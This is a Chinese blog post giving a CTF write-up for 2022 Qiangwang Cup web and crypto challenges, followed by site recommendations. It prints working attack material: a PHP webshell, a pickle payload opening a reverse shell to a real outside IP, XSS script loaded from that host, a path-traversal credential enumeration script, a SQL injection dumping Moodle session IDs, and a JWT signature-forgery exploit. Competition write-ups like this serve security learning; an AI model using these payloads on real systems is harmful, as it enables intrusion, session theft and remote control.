强网杯2022 web

最新推荐文章于 2022-09-11 11:54:44 发布
最新推荐文章于 2022-09-11 11:54:44 发布
阅读量683 收藏 1
点赞数 1
分类专栏: wp 文章标签: 前端 php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53263789/article/details/126377080
版权

强网先锋

rcefile

www.zip下载,config.inc.php存在 spl_autoload_register 函数,upload.php存在php检测

上传.inc文件

<?php
system($_GET[1]);
?>

添加反序列化内容

O:32:"5cbd14722da34dc4663bd2eabf2da83b":1:(s:3:"cmd";N;)

image-20220730100449929

showfile.php执行反序列化

image-20220730100501254

FLAG:flag{df856459-8b39-4f50-9b8f-8f3c021ed76a}

华东南赛区web01(sql_autoload_register) | (guokeya.github.io)

WP-UM

image-20220731122524820

猫哥最近用wordpress搭建了一个个人博客,粗心的猫哥因为记性差,所以把管理员10位的账号作为文件名放在/username下和15位的密码作为文件名放在/password下。
并且存放的时候猫哥分成一个数字(作为字母在密码中的顺序)+一个大写或小写字母一个文件,例如admin分成5个文件,文件名是1a 2d 3m 4i 5n

注册用户后上传检测,发现一个上传插件的cve:用户元< 2.4.4 - 通过路径遍历的 Subscriber+ 本地文件枚举 WordPress 安全漏洞 (wpscan.com)

上传png后替换pf_nonce

image-20220731123210518

验证漏洞

image-20220731124651421

脚本跑出username和password

import requests

url = 'http://eci-2ze4dm8xhkfu2mwl6mx8.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php'
strings = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
num = 1
username = ''
#password = ''

while True:
    for i in strings:
        data = {
            "field_name":"test",
            "filepath":'/../../../../../../../../username/{num}{i}'.format(num=num,i=i),
            #"filepath":'/../../../../../../../../password/{num}{i}'.format(num=num,i=i),
            "field_id":"um_field_4",
            "form_key":"Upload",
            "action":"um_show_uploaded_file",
            "pf_nonce":"df4dc42fbb",
            "is_ajax":"true"
        }
        cookies = {
            "wordpress_logged_in_89440c07e899dcdc36bf928bbc488c24":"123%7C1659414508%7CV50CgetWCwqdK39JhNXZnsuTYNOh6JLawZTXW1nuOCA%7C532627ab0ba66687383b7902d05c104d8ebefa995f377001d7a96fa10ad599d0"
        }

        r = requests.post(url=url,cookies=cookies,data=data)
        if 'umRemoveFile' in r.text:
            username+=i
            num+=1
            print(username)
            break

MaoGePaMao/MaoGeYaoQiFeiLa

加上php

image-20220731131619666

传shell

image-20220731132015562

FLAG:flag{bd6a93fa-7707-4184-9f35-693b9291da3b}

WEB

babyweb

成功执行js

image-20220730110104551

发现是发起了websocket请求去更改密码

image-20220730110716820

xss打cors修改密码

//1.html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Y0ng</title>
</head>
<body>
    <script src="http://150.158.181.145/1.js"></script>
</body>
</html>


//1.js
const socket = new WebSocket('ws://127.0.0.1:8888/bot');

// Connection opened
socket.addEventListener('open', function (event) {
    socket.send('changepw 123');
});

登陆后是一个购买hint,给了部分源码,buy部分是由go语言进行处理,前面为python进行处理。

image-20220730113830819

利用go和python解析的差异,让go解析第一个product,给admin加钱

image-20220730130911521

购买flag

image-20220730133200695

FLAG:flag{6a7de156-9b87-435b-89b8-7a72bb02a35b}

crash

opcode反弹shell

import base64
import pickletools

a = b'''(cos
system
S'bash -c "bash -i >& /dev/tcp/150.158.181.145/3000 0>&1"'
o.'''

a = pickletools.optimize(a)
print(a)
print(base64.b64encode(a))

easylogin

开放了80以及8888端口,wordpress存在sql注入 https://www.freebuf.com/articles/web/321297.html

注出Moodle的管理员session

action=aa&query_vars[tax_query][1][include_children]=1&query_vars[tax_query][1][terms][1]=1) or updatexml(1,concat(0x7e,(SELECT sid FROM moodle.mdl_sessions where userid=2 limit 0,1),0x7e),1)#&query_vars[tax_query][1][field]=term_taxonomy_id

image-20220731132521558

替换cookie,成功登录,后台上传zip rce:https://github.com/HoangKien1020/Moodle_RCE

image-20220731141720740

命令执行

image-20220731141312099

FLAG:flag{Congratulations_on_completing_the_task_Please_donot_affect_others_progress}

easyweb

路径穿越读index.php,class.php,upload.php就是没法读showfile.php

image-20220730141244153

根据读到的class.php文件比对,这里应该使用的 GuestShow 下的 show 方法,调用了file_get_contents 方法,存在phar反序列化的可能性,但是题目竟然没有办法上传文件,原因为upload.php中的 $_SESSION 不存在。

image-20220731093153359

不过可以利用PHP_SESSION_UPLOAD_PROGRESS 进行绕过,然后构造phar包,去反序列化

/etc/hosts

127.0.0.1	localhost
::1	localhost ip6-localhost ip6-loopback
fe00::0	ip6-localnet
ff00::0	ip6-mcastprefix
ff02::1	ip6-allnodes
ff02::2	ip6-allrouters
172.18.0.2	f3d4be8c6938
10.10.10.5	f3d4be8c6938

/proc/net/arp

IP address       HW type     Flags       HW address            Mask     Device
172.18.0.1       0x1         0x2         02:42:60:b2:90:eb     *        eth0

Crypto

myJWT

CVE-2022-21449,Java自带ECDSA签名验证函数存在漏洞,签名设置为0即可绕过。

import base64

code = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJteUVTIn0=.eyJpc3MiOiJxd2IiLCJuYW1lIjoiMTExIiwiYWRtaW4iOmZhbHNlLCJleHAiOjE2NTkyMjk2Mzc1MjV9.Z0eiAr2mF567sUbjGp72N35dGkVb82kqLdDz14qRvVsiWpOYY2nTXB20_Y3QoCX0oKGahrcTBqSP6Qhtw1U2-OeeAu38CTYxSj0ae0Fpa4c7FQM7BW7gvVy9QIHiQ901'
jwt = code.split('.')

jwt0 = base64.b64decode(jwt[0])
jwt1 = base64.b64decode(jwt[1]).replace(b'false',b'true')
#print(jwt1)
jwt2 = b'\x00' * len(base64.urlsafe_b64decode(jwt[2]))
#print(len(jwt2))

payload = base64.b64encode(jwt0)+b'.'+base64.b64encode(jwt1)+b'.'+base64.b64encode(jwt2)
print(payload)

image-20220731090833292

FLAG:flag{cve-2022-21449_Secur1ty_0f_c0de_1mplementation}

Ff.cheng
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Fastjson RCE续(自动化)
limb0的博客
07-31 2085
Fastjson RCE续(自动化) 一、漏洞介绍 参阅Fastjson≤1.2.47 RCE。 二、漏洞危害 参阅Fastjson≤1.2.47 RCE。 三、漏洞验证 环境搭建: 实验环境 系统 IP地址 攻击机 win10 199.200.234.44 靶机 Centos7 192.168.134.133 docker pull vulhub/fastjson #拉取镜像 docker run -d -p 8080:8080 -p 8443:8443 initidc/f
强网杯2022 pwn 赛题解析.docx
最新发布
12-18
强网
第六届“强网杯”青少年专项赛 writewp by 楠辞姐姐后援团
JEWSWS的博客
09-11 2428
这次比赛难度很大,Crypto部分也全都是猜谜语类型的题目,没啥游戏体验,不过好在排名在前30.本篇WP为团队WP,团队成员为:树木,AcexZe,Lenyi战队名称:楠辞姐姐后援团战队排名:24。
【第六届强网杯CTF-Wp】
qq_45603443的博客
08-02 2430
第六届强网杯全国网络安全挑战赛wp
13.反序列化
qq_45926195的博客
10-31 208
13.1什么是反序列化 就是把一个对象变成可以传输的字符串,目的就是为了方便传输。假设,我们写了一个class,这个class里面存有一些变量。当这个class被实例化了之后,在使用过程中里面的一些变量值发生了改变。以后在某些时候还会用到这个变量,如果我们让这个class一直不销毁,等着下一次要用它的时候再一次被调用的话,浪费系统资源。当我们写一个小型的项目可能没有太大的影响,但是随着项目的壮大,一些小问题被放大了之后就会产生很多麻烦。这个时候PHP就和我们说,你可以把这个对象序列化了,存成一个字符串..
三、Web漏洞-反序列化
weixin_70557959的博客
05-11 3560
37、WEB漏洞-反序列化之PHP(上) 原理 PHP 反序列化原理: 1.未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL 注入,目录遍历等不可控后果。 2.其实跟文件解析差不多,都是由于传递的恶意参数被执行(序列化和反序列化相当于加解密过程) 3.在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。 ---序列化函数:serialize() //将一个对象转换成一个字符串 ...
强网杯2022 pwn 赛题解析——house_of_cat
CoLin的pwn小屋
08-04 2822
强网杯2022 pwn 赛题分析——house_of_cat
2022强网web(部分)
羽的博客
08-01 4188
2022强网web
谷歌服务安装包.zip_Apache Solr JMX服务 RCE 漏洞复现
weixin_39718460的博客
11-19 511
0x00 漏洞概述Apache Solr的8.1.1和8.2.0版本的自带配置文件solr.in.sh中存在不安全的选项ENABLE_REMOTE_JMX_OPTS="true"。如果受害者使用了该默认配置,则会在默认端口18983开放JMX服务,且默认未开启认证。任何可访问此端口的攻击者可利用此漏洞向受影响服务发起攻击,执行任意代码。0x01 影响版本Apache Solr8.1.1和8.2.0...
强网杯2021 Web.zip
12-17
强网
强网杯 WriteUp By Nu1L
08-02
2022年第六届“强网杯”全国网络安全挑战赛
2022强网web(部分).docx
12-18
强网
【BUUCTF】web强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
【Reverse】2022 强网杯 game
woodwhale的博客
08-13 454
复现一下强网杯的game
强网杯2022·Crypto
PUTAOAO的博客
08-01 1707
强网
[复现]-2021强网杯 [强网先锋]赌徒
zji
06-27 503
[复现]-2021强网杯 [强网先锋]赌徒 主要过程 首先我是centos7 php 。然后vim /flag根目录创建flag flag{35-44c7-850e-131e10c9a6ud} 我省略了zip.www扫描源码。 1、 在根目录下建立flag文件(这个文件在正式做题中我们是见不到的,实际上是需要我们通过解题找到这个文件的) vim /flag输入flag: flag{70702196032-ec35-44c7-850e-131e10c9a6ud} 保存退出 2、 在网站目录建立test
[强网杯2022]WP-UM
Landasika的博客
08-02 575
考点WordPressUserMetaLitePro2.4.3Path遍历漏洞CVE-2022-0779。
Kernel pwn 入门 (6)
CoLin的pwn小屋
07-31 623
强网杯2021赛题解析——notebook,userfaultfd利用学习
[强网杯 2022]easyapk
12-17
强网杯2022的Easyapk是一个安卓应用逆向分析的题目。该题目的目标是从给定的.apk文件中获取指定的flag。 解题过程主要包括以下几个步骤: 1. 首先,我们需要使用apktool来对.apk文件进行反编译。apktool是一款开源...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值